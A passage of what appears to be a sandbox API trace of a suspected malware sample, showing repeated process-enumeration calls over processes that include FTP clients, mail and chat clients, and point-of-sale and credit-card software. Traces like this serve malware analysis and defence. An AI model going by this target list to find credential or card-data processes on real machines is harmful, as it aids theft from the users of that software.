szExeFile="insteadrecent.exe")) returned 1 [0220.708] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0220.710] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0220.711] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0220.713] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0220.714] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0220.716] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0220.755] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0220.757] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0220.759] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0220.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0220.762] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0220.763] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0220.765] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0220.766] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0220.768] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0220.787] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0220.792] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0220.795] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0220.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0220.799] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0220.802] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0220.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0220.856] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0220.858] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0220.861] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0220.863] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0220.865] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0220.867] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0220.869] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0220.871] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0220.873] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0220.875] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0220.877] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0220.880] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0220.882] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0220.884] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0220.887] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0220.889] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0220.891] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0220.933] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0220.935] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0220.937] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0220.939] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0220.941] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0220.942] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0220.945] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0220.946] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0220.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0220.950] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0220.952] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0220.954] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0220.956] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0220.957] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0220.959] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0220.961] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0220.963] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0220.966] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0221.033] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0221.037] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0221.039] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0221.041] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.044] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0221.046] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0221.048] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.053] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.055] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0221.056] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.058] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0221.059] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0221.060] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0221.062] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0221.064] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0221.065] CloseHandle (hObject=0x1eb8) returned 1 [0221.066] Sleep (dwMilliseconds=0x64) [0221.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0221.197] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.225] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.226] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.228] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.229] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.231] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.233] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.235] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.236] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.238] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 